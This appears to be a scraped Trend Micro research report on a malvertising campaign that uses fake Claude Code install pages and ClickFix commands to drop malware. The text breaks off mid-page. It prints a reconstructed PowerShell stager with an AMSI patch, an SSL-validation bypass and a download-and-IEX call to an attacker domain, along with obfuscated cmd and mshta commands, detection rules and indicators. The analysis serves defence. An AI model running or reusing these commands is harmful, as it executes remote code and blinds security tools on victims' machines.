InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise | Trend Micro (US)<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendmicro\/clientlibs\/trendmicro-core-2\/clientlibs\/header-footer.min.cc255fd374a145c2653503eb2da45983.css\" type=\"text\/css\">\n<link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.47ce60d92d94610907e7a2cbd6fbca69.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/26\/e\/installfix-and-claude-code.html\"><br \/>\n<meta property=\"og:title\" content=\"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/26\/installfix_thunbnail.jpg\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/26\/installfix_thunbnail.jpg\"> <meta name=\"user-country-code\" content=\"US\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.708113804004\">  <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a>  <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"256818984\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"12.5\">\n<div class=\"article-details\" role=\"heading\" readability=\"45\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Cyber Threats<\/p>\n<p class=\"article-details__description\">Targeting multiple industries worldwide, the InstallFix campaign uses fake Claude AI installer pages to trick users into running malware that collects system information, disables security features, achieves persistence, and connects to attacker-controlled C&C servers for additional payloads.<\/p>\n<p class=\"article-details__author-by\">By: Allixon Kristoffer Francisco, Gabriel Nicoleta, Jonna Santos, Mohamed Fahmy <time class=\"article-details__date\">May 05, 2026<\/time> <span>Read time: <\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<div class=\"article-details__icons\">  <\/p>\n<div class=\"a2a_kit a2a_default_style\" data-a2a-icon-color=\"#717172\"> <a class=\"a2a_dd addthis_link\" href=\"https:\/\/www.addtoany.com\/share\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/share-more.svg\" class=\"svg-icon\" alt=\"Share\"> <\/a> <a class=\"a2a_button_print addthis_link\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/printer.svg\" class=\"svg-icon\" alt=\"Print\"> <\/a> <\/div>\n<p>   <\/div>\n<\/div><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div>\n<div class=\"richText\" readability=\"40.5\">\n<div readability=\"26\">\n<ul>\n<li><span class=\"rte-red-bullet\">The InstallFix campaign involves a social engineering attack that targets users searching for Anthropic\u2019s Claude AI by distributing malware through fake installation pages promoted via Google Ads.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Attackers leverage realistic, OS-specific installation instructions to trick users into running malicious PowerShell commands, which initiate a multi-stage infection chain involving mshta.exe, obfuscated scripts, and fileless payload delivery.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The campaign\u2019s infection chain includes advanced evasion techniques such as AMSI bypass, SSL certificate validation disabling, and victim-unique command-and-control URLs, complicating detection and remediation.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Telemetry from TrendAI Vision One\u2122 confirmed the creation of scheduled tasks for persistence and observed network traffic to attacker-controlled C&C servers.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The campaign targets organizations across the Americas, Asia Pacific, Middle East, and Africa (AMEA), and Europe, including industries such as government, electronics, education, and food & beverage.<\/span><\/li>\n<\/ul>\n<p>In an era where artificial intelligence tools have become indispensable to modern workflows, threat actors are exploiting this dependency with alarming sophistication. The InstallFix campaign \u2014 also known as the Fake Claude Installer threat \u2014 represents a dangerous evolution in social engineering, weaponizing trust in legitimate AI platforms to deliver state-linked espionage malware. This report examines how adversaries are impersonating Anthropic’s Claude AI assistant, leveraging its 290 million monthly users to distribute malware through meticulously crafted fake installation pages. As organizations rush to integrate AI capabilities, understanding these deceptive tactics is no longer optional, but critical to survival in today’s threat landscape.<\/p>\n<p>As modern software installation often involves copying and running commands (for example, \u201ccurl-to-bash\u201d), attackers take advantage of this behavior by creating fake but realistic installation pages. These pages trick users into executing malicious commands, leading to malware infections.<\/p>\n<p>The threat is especially significant because it targets both developers and non-technical users who are increasingly using command-line tools, expanding the pool of potential victims.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p>We identified attacks against targets in the following countries and industries:<\/p>\n<p><b>Regions<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Americas<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Asia Pacific, Middle East, and Africa (AMEA)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Europe<\/span><\/li>\n<\/ul>\n<p><b>Countries<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Malaysia<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Netherlands<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Thailand<\/span><\/li>\n<li><span class=\"rte-red-bullet\">US<\/span><\/li>\n<\/ul>\n<p><b>Industries<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Electronics<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Education<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Food and beverage<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Government<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.5\">\n<div readability=\"18\">\n<p>The fake install pages are distributed exclusively through Google Ads, specifically through sponsored search results that appear when users search for terms like “Claude Code” and “Claude Code install”. According to feedback from an MDR customer, a fraudulent landing page was visited by the user after clicking a sponsored link at the top of the search results; the user assumed the site was legitimate because it was promoted through Google Ads.<\/p>\n<p>The fake website includes a malicious command that uses PowerShell and MSHTA to execute and install a counterfeit Claude application on Windows systems and MacOS systems, though the buttons on the fake website seem to not work. The malvertising URL is designed to mimic a Google Ads link structure. The parameters <i>gar_source<\/i> and <i>gad_campaign<\/i> resemble advertising tracking fields commonly associated with Google Ads. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig01.png\" alt=\"Figure 1. Feedback from an MDR customer\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 1. Feedback from an MDR customer<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig02.png\" alt=\"Figure 2. A sponsored result appeared at the top of Google search results when the user was looking for the Claude installer\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 2. A sponsored result appeared at the top of Google search results when the user was looking for the Claude installer<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig03.png\" alt=\"Figure 3. Fraudulent landing page \"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 3. Fraudulent landing page <\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig04.png\" alt=\"Figure 4. The fake website with a malicious command for Windows systems\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 4. The fake website with a malicious command for Windows systems<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig05.png\" alt=\"Figure 5. The fake website with a malicious command for macOS systems\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 5. The fake website with a malicious command for macOS systems<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig06.png\" alt=\"Figure 6. Error page when buttons on the fake page are clicked\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 6. Error page when buttons on the fake page are clicked<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"29.395348837209\">\n<div readability=\"8.2674418604651\">\n<p>Our telemetry from <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/one-platform.html\" target=\"_blank\">TrendAI Vision One\u2122<\/a> showed that PowerShell on an endpoint invoked mshta.exe to download and execute a malicious payload (claude[.]msixbundle) from known malicious domain <i>download-version[.]1-5-8[.]com<\/i>.<b><\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig07.png\" alt=\"Figure 7. mshta.exe invoked to download and execute a malicious payload\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 7. mshta.exe invoked to download and execute a malicious payload<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig08.png\" alt=\"Figure 8. Outbound network connections and domain queries after user execution of malicious PowerShell commands\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 8. Outbound network connections and domain queries after user execution of malicious PowerShell commands<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig09.png\" alt=\"Figure 9. Obfuscated PowerShell code\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 9. Obfuscated PowerShell code<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig10.png\" alt=\"Figure 10. Deobfuscated PowerShell commands\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 10. Deobfuscated PowerShell commands<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p>The deobfuscated PowerShell code performs the following commands:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Generates a unique ID for the victim machine<\/b><span> – To check if this has been infected<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Disables SSL certificate validation<\/b><span> – To trust any HTTPS certificate<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Decrypts\/decodes hidden strings<\/b><span> – Additional strings needed<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Attempts to tamper with internal .NET behavior<\/b><span> – Likely security bypass<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Downloads a payload from a remote server<\/b><span> – Another payload<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Executes it in memory<\/b><span> – For defense evasion<\/span><\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"38.5\">\n<div readability=\"22\">\n<p>A TrendAI Vision One\u2122 detection filter, <b>MSHTA Spawning Windows Shell<\/b>, was triggered during the observed incident. It covers the critical stage where mshta.exe spawns a Windows shell process. <\/p>\n<p><b>What the rule detects<\/b><\/p>\n<p>The rule fires on <i>TELEMETRY_PROCESS_CREATE<\/i> events and covers two bilateral directions of the mshta.exe \/ shell process relationship:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Mshta as parent:<\/b><span> mshta.exe spawns any of: cmd.exe, powershell.exe, wscript.exe, cscript.exe, sh.exe, bash.exe, reg.exe, regsvr32.exe, or bitsadmin<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Mshta as child:<\/b><span> cmd.exe, powershell.exe, wscript.exe, cscript.exe, sh.exe, bash.exe, reg.exe, regsvr32.exe, or bitsadmin spawns mshta.exe <\/span><\/span><\/li>\n<\/ul>\n<p><b>Relevance to this campaign<\/b><\/p>\n<p>In the InstallFix incident, the rule triggered mshta.exe (processFilePath) spawning cmd.exe (objectFilePath) as part of the VBScript COM launcher stage. TrendAI Apex One\u2019s\u2122 Malware Behavior Blocking acted on the detection with a Terminate action, killing the malicious PowerShell child process (policy: FLS.ISB.4886T).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<p><span class=\"body-subhead-title\">Infection chain<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig11.jpg\" alt=\"Figure 11. Stages of the infection chain\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 11. Stages of the infection chain<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p><b>Stage 1: Initial Access Google Ads Malvertisement (T1566.002 \/ T1583.008)<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Technique:<\/b><span> Phishing via Google Ads sponsored results (T1566.002); Malvertisement (T1583.008)<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Delivery:<\/b><span> Fake \u201cClaude Code\u201d install page served via paid Google search placement<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Lure:<\/b><span> Realistic install page with OS-specific commands Windows and macOS variants present<\/span><\/span><\/li>\n<\/ul>\n<p>Attackers purchased Google Ads placements to intercept users searching for Claude Code. The sponsored result leads to a fake landing page styled as a legitimate install guide. Using the ClickFix social engineering pattern, the page presents an OS-specific command and instructs the user to run it framing execution as a required installation step. On Windows, executing the command causes the browser or shell to invoke mshta.exe against the remote payload URL.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"17\">\n<p><b>Stage 2: MSHTA Fetches and Executes ZIP\/HTA Polyglot (T1218.005)<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Technique:<\/b> <span>System Binary Proxy Execution: Mshta (T1218.005)<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>File:<\/b><span> claude.msixbundle<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Host:<\/b> <span>download-version.1-5-8[.]com<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>File structure:<\/b><span> Valid ZIP archive with HTA payload appended at byte offset 882290 (ZIP\/HTA polyglot)<\/span><\/span><\/li>\n<\/ul>\n<p>The ClickFix command invokes mshta.exe with a remote URL pointing to claude.msixbundle. Despite its extension, the file is a ZIP\/HTA polyglot \u2014 the archive contains real Microsoft Bing packages bearing valid Microsoft Marketplace signatures, lending it a convincing appearance of legitimacy. The first 882290 bytes VirusTotal identifies it as an Archive file with ‘PK’ magic bytes), while mshta.exe reads the HTA content appended at the end of the file. This dual-format structure allows the file to pass as a benign package while mshta.exe executes the appended malicious HTA directly.<\/p>\n<blockquote readability=\"7\">\n<p>Process chain observed in telemetry:<br \/> explorer.exe<br \/> powershell.exe (user ran ClickFix command from fake install page)<br \/> mshta.exe https[:\/\/]download-version[.]1-5-8[.]com\/claude[.]msixbundle<\/p>\n<\/blockquote><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p><b>Stage 3: HTA VBScript Executes Silently – COM Shell Launcher (T1559.001 \/ T1059.005)<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Technique:<\/b><span> Component Object Model abuse via Shell.Application (T1559.001)<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Technique:<\/b><span> VBScript execution embedded in HTA (T1059.005)<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Evasion:<\/b><span> Window resized to 0x0 pixels no visible UI presented to the user<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>COM Object:<\/b><span> Shell.Application | GUID: 9BA05972-F51F-4DE8-95A4-F561CC55EBC4<\/span><\/span><\/li>\n<\/ul>\n<p>The appended HTA executes VBScript silently inside mshta.exe. The script uses two named decoding functions to deobfuscate its payload before launching the next stage:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>DisplayEmailGnu()<\/b><span> – hex-decodes obfuscated strings embedded in the HTA<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>GetBiosDebian()<\/b><span> – base64-decodes the cmd.exe command<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Shell.Application COM object (GUID: 9BA05972-F51F-4DE8-95A4-F561CC55EBC4)<\/b><span> – executes the decoded command via ShellExecute<\/span><\/span><\/li>\n<\/ul>\n<p>The decoded command launched by the HTA:<\/p>\n<blockquote><p>cmd.exe \/v:on \/c “set x=pow&&set y=ershell&&call %windir%\\SysWOW64\\WindowsPowerShell\\v1.0\\!x!!y! -E “<\/p><\/blockquote>\n<p>The DispHTMLWindow2.resizeTo(0,0) call ensures the MSHTA window remains invisible to the user throughout execution. AMSI telemetry confirmed the VBScript executed within the mshta.exe process context and captured the decoded COM call sequence.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p><b>Stage 4: cmd.exe Reconstructs PowerShell Encoded Stager Executes (T1027 \/ T1059.001)<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Technique:<\/b> <span>Obfuscated Files or Information variable splitting + encoded command (T1027)<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Technique:<\/b> <span>Command and Scripting Interpreter: PowerShell via SysWOW64 (T1059.001)<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Technique:<\/b><span> Disable or Modify Tools – AMSI patched via WriteInt32 (T1562)<\/span><\/span><\/li>\n<\/ul>\n<p>cmd.exe runs with delayed variable expansion (\/v:on) and uses the variable-splitting trick (set x=pow && set y=ershell) to reconstruct the string ‘powershell’ at runtime, evading static command-line detection. It then invokes the 32-bit SysWOW64 PowerShell binary with a UTF-16LE base64-encoded payload via the -E flag.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>The decoded PowerShell stager performs the following operations in sequence:<\/p>\n<ol>\n<li><b>Victim fingerprinting:<\/b> <span>Computes MD5(COMPUTERNAME + USERNAME), takes the first 16 hex characters in lowercase as a unique victim token ($nipple)<\/span><\/li>\n<li><b>SSL bypass:<\/b> <span>Sets [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}<\/span><\/li>\n<li><b>AMSI bypass:<\/b> <span>RC4-decrypts AMSI bypass strings (via custom GlobalJson and TenantId cipher functions) using key BWJFEesMEqRvjQbm, then writes 0x41414141 to amsiContext via [Runtime.InteropServices.Marshal]::WriteInt32 blinding AMSI for the remainder of the session<\/span><\/li>\n<li><b>Fileless payload retrieval:<\/b><span> Downloads Stage 4 from the victim-unique C&C URL and executes it in memory via Invoke-Expression (IEX)<\/span><\/li>\n<\/ol>\n<blockquote><p># Decoded PowerShell stager logic (reconstructed from base64 telemetry)<br \/> <br \/># Step 1 Victim fingerprint<br \/> $nipple = (Get-FileHash -InputStream([IO.MemoryStream]::new(<br \/> [Text.Encoding]::UTF8.GetBytes($env:COMPUTERNAME + $env:USERNAME)<br \/> )) -Algorithm MD5).Hash.Substring(0,16).ToLower()<br \/> <br \/># Step 2 SSL bypass<br \/> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}<br \/> <br \/># Step 3 AMSI patch (RC4 key: BWJFEesMEqRvjQbm)<br \/> # RC4 decrypts AMSI bypass strings -> writes 0x41414141 to amsiContext<br \/> [Runtime.InteropServices.Marshal]::WriteInt32(<amsiContext>, 0x41414141)<br \/> <br \/># Step 4 Fileless stage-4 fetch and execute<br \/> $Filter = (New-Object Net.WebClient).DownloadString(<br \/> “https:\/\/$nipple.oakenfjrod[.]ru\/cloude-91267b64-989f-49b4-89b4-984e0154d4d1”<br \/> )<br \/> IEX $Filter<\/p><\/blockquote>\n<p>The victim-unique subdomain (16-character hex derived from machine identity) means each host contacts a distinct URL, complicating bulk network-level blocking and potentially enabling per-victim payload customization by the actor.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p><b>Stage 5: Final Payload Fileless Execution (Not Recovered)<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Source:<\/b><span> https:\/\/[nipple].oakenfjrod[.]ru\/cloude-91267b64-989f-49b4-89b4-984e0154d4d1<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>SHA1:<\/b><span> 811fbf0ff6b6acabe4b545e493ec0dd0178a0302 (file recovered from path; content execution not confirmed)<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>SHA256:<\/b><span> 2f04ba77bb841111036b979fc0dab7fcbae99749718ae1dd6fd348d4495b5f74<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Status:<\/b><span> Not fully recovered – TrendAI Apex One\u2122 terminated the process chain at Stage 3 before IEX completed<\/span><\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>Claude.msixbundle.zip is the file downloaded from <i>hxxps[:\/\/]download-version[.]1-5-8[.]com\/claude[.]msixbundle<\/i>. File analysis confirmed the presence of a valid file signature, with the file header beginning with the \u201cPK\u201d identifier. This indicates that the file is a ZIP-based archive format, consistent with compressed package structures commonly used to distribute software or payloads. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig12.png\" alt=\"Figure 12. The VirusTotal result showing that the file is a ZIP file\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 12. The VirusTotal result showing that the file is a ZIP file<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig13.png\" alt=\"Figure 13. The file header to the payload\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 13. The file header to the payload<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig14.png\" alt=\"Figure 14. The file signature for zip file containing \u201cPK\u201d\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 14. The file signature for zip file containing \u201cPK\u201d<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>Based on the threat intelligence, this malware uses different file formats like mp3 to bypass security.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig15.png\" alt=\"Figure 15. The archive file\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 15. The archive file<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>When checking the archive file, it was found that the file contains a single archive. This archive appears to hold a normal file. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig16.png\" alt=\"Figure 16. The extraction of the file\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 16. The extraction of the file<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The contents of the file appear to consist of normal file components. At this stage, nothing obviously malicious or unusual is observed in the extracted files, and they resemble a standard application.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig17.png\" alt=\"Figure 17. The third stage of analysis\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 17. The third stage of analysis<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>The embedded HTML code was identified inside the ZIP file. This suggests that the file may be part of a multi-stage execution chain, where HTML is used as a container or delivery mechanism for additional payloads or scripts.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig18.jpg\" alt=\"Figure 18. The VBScript payload in Claude.msixbundle.zip\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 18. The VBScript payload in Claude.msixbundle.zip<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The ZIP file (Claude.msixbundle.zip) was found to include an embedded, obfuscated VBScript payload delivered through an HTML file. The script appears to be intentionally obfuscated, suggesting malicious intent and likely designed to evade detection or analysis.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig19.png\" alt=\"Figure 19. The hex values under DisplayEmailGNU\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 19. The hex values under DisplayEmailGNU<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Decoding and reconstructing the hex values under the variable <i>DisplayEmailGNU<\/i> using CyberChef reveals that the command is a PowerShell execution command. This activity was also observed and captured by Vision One, confirming the execution behavior associated with the payload.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig20.png\" alt=\"Figure 20. Decoded PowerShell command\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 20. Decoded PowerShell command<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>The decoded PowerShell command invokes another file to perform additional obfuscation and execution:<\/p>\n<p><b>(https:\/\/$nipple[.]oakenfjrod[.]ru\/cloude-91267b64-989f-49b4-89b4-984e0154d4d1)<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b><nipple><\/b> <span>– MD5-based machine ID<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>oakenfjrod[.]ru<\/b> <span>– attacker-controlled domain<\/span><\/span><\/li>\n<li><span 